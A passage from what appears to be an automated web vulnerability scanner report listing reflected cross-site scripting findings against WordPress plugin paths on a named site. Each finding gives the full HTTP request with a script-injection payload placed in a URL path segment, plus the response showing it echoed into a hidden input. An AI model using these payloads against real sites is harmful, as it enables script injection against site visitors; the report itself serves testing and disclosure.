The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a684e"><script>alert(1)</script>627dceec1f5 was submitted in the REST URL parameter 7. This input was echoed as a684e\"><script>alert(1)</script>627dceec1f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCata684e"><script>alert(1)</script>627dceec1f5/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCata684e\"><script>alert(1)</script>627dceec1f5/default/default.css" />
...[SNIP]...

4.231. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fcaf"><script>alert(1)</script>da9e0f185c2 was submitted in the REST URL parameter 8. This input was echoed as 2fcaf\"><script>alert(1)</script>da9e0f185c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default2fcaf"><script>alert(1)</script>da9e0f185c2/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674592+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674592; expires=Thu, 02-Feb-2012 19:23:12 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default2fcaf\"><script>alert(1)</script>da9e0f185c2/default.css" />
...[SNIP]...

4.232. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89b32"><script>alert(1)</script>7331cbe4720 was submitted in the REST URL parameter 9. This input was echoed as 89b32\"><script>alert(1)</script>7331cbe4720 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css89b32"><script>alert(1)</script>7331cbe4720 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674594+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674594; expires=Thu, 02-Feb-2012 19:23:14 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css89b32\"><script>alert(1)</script>7331cbe4720" />
...[SNIP]...

4.233. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/lightbox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5448d"><script>alert(1)</script>cc9ed16c3fe was submitted in the REST URL parameter 1. This input was echoed as 5448d\"><script>alert(1)</script>cc9ed16c3fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site5448d"><script>alert(1)</script>cc9ed16c3fe/wp-content/plugins/superslider-show/js/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674567; expires=Thu, 02-Feb-2012 19:22:47 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site5448d\"><script>alert(1)</script>cc9ed16c3fe/wp-content/plugins/superslider-show/js/lightbox.js" />
...[SNIP]...

4.234. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/lightbox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d297"><script>alert(1)</script>6e88aecf5d was submitted in the REST URL parameter 2. This input was echoed as 5d297\"><script>alert(1)</script>6e88aecf5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content5d297"><script>alert(1)</script>6e88aecf5d/plugins/superslider-show/js/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content5d297\"><script>alert(1)</script>6e88aecf5d/plugins/superslider-show/js/lightbox.js" />
...[SNIP]...

4.235. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/lightbox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82075"><script>alert(1)</script>60d6f3a8f48 was submitted in the REST URL parameter 3. This input was echoed as 82075\"><script>alert(1)</script>60d6f3a8f48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins82075"><script>alert(1)</script>60d6f3a8f48/superslider-show/js/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins82075\"><script>alert(1)</script>60d6f3a8f48/superslider-show/js/lightbox.js" />
...[SNIP]...

4.236. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/lightbox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3bd6"><script>alert(1)</script>741621bff9a was submitted in the REST URL parameter 4. This input was echoed as d3bd6\"><script>alert(1)</script>741621bff9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-showd3bd6"><script>alert(1)</script>741621bff9a/js/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674573+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-showd3bd6\"><script>alert(1)</script>741621bff9a/js/lightbox.js" />
...[SNIP]...

4.237. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/lightbox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cceed"><script>alert(1)</script>accf7f7fb5a was submitted in the REST URL parameter 5. This input was echoed as cceed\"><script>alert(1)</script>accf7f7fb5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/jscceed"><script>alert(1)</script>accf7f7fb5a/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/jscceed\"><script>alert(1)</script>accf7f7fb5a/lightbox.js" />
...[SNIP]...

4.238. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/lightbox.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0971"><script>alert(1)</script>0fb985cf187 was submitted in the REST URL parameter 6. This input was echoed as b0971\"><script>alert(1)</script>0fb985cf187 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/js/lightbox.jsb0971"><script>alert(1)</script>0fb985cf187 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/js/lightbox.jsb0971\"><script>alert(1)</script>0fb985cf187" />
...[SNIP]...

4.239. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slideshow.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd21"><script>alert(1)</script>f0633c6001b was submitted in the REST URL parameter 1. This input was echoed as 4cd21\"><script>alert(1)</script>f0633c6001b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site4cd21"><script>alert(1)</script>f0633c6001b/wp-content/plugins/superslider-show/js/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674562; expires=Thu, 02-Feb-2012 19:22:42 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site4cd21\"><script>alert(1)</script>f0633c6001b/wp-content/plugins/superslider-show/js/slideshow.js" />
...[SNIP]...

4.240. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slideshow.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae35"><script>alert(1)</script>8c6c868a5fe was submitted in the REST URL parameter 2. This input was echoed as eae35\"><script>alert(1)</script>8c6c868a5fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contenteae35"><script>alert(1)</script>8c6c868a5fe/plugins/superslider-show/js/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contenteae35\"><script>alert(1)</script>8c6c868a5fe/plugins/superslider-show/js/slideshow.js" />
...[SNIP]...

4.241. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slideshow.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553e1"><script>alert(1)</script>04e840362be was submitted in the REST URL parameter 3. This input was echoed as 553e1\"><script>alert(1)</script>04e840362be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins553e1"><script>alert(1)</script>04e840362be/superslider-show/js/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674566+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
